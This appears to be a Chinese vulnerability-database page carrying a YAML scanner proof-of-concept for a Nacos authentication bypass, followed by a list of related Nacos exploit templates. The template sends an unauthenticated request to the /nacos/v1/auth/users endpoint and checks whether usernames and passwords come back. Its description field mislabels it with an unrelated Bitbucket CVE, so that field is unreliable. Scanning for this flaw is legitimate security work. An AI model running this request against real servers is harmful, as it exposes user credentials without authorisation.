nacos-core-auth-enabled-bypass: Nacos core.auth.enabled 权限绕过

漏洞描述

PoC代码[已公开]

id: nacos-core-auth-enabled-bypass

info:
  name: Nacos core.auth.enabled 权限绕过
  author: yoyo
  severity: critical
  verified: true
  description: atlassian-bitbucket-代码注入-CVE-2022-36804

rules:
  r0:
    request:
      method: GET
      path: /nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=
    expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"password":') && response.headers["content-type"].contains('application/json')
expression: r0()

相关漏洞推荐

• 无POCNacos /nacos/v1/cs/configs 信息泄露漏洞
• 无POCNacos /nacos/v1/auth/users/login 默认口令漏洞
• POCnacos-create-user-unauthorized: Nacos Unauthorized Create User
• POCnacos-user-list-unauthorized: Alibaba Nacos V1 Auth Bypass
• POCnacos-authentication-bypass: Nacos < 2.2.0 - Authentication Bypass
• POCnacos-config-server-sql-inject: Naocos Config Server SQL injection
• POCnacos-jraftserver-deserialization-rce: Nacos Jraft 远程代码执行 RCE
• POCnacos-secret-default-key-unauth: Alibaba Nacos secret.key默认密钥 未授权访问漏洞
• POCnacos-severidentity-bypass: Alibaba Nacos ServerIdentity 权限绕过
• POCnacos-sync-login-bypass: Nacos-Sync 未授权进后台
• 无POCNacos /nacos/v1/auth/users 权限绕过漏洞（CVE-2021-43116）
• POCCVE-2021-29441: Nacos <1.4.1 - Authentication Bypass
• POCCVE-2021-29442: Nacos <1.4.1 - Authentication Bypass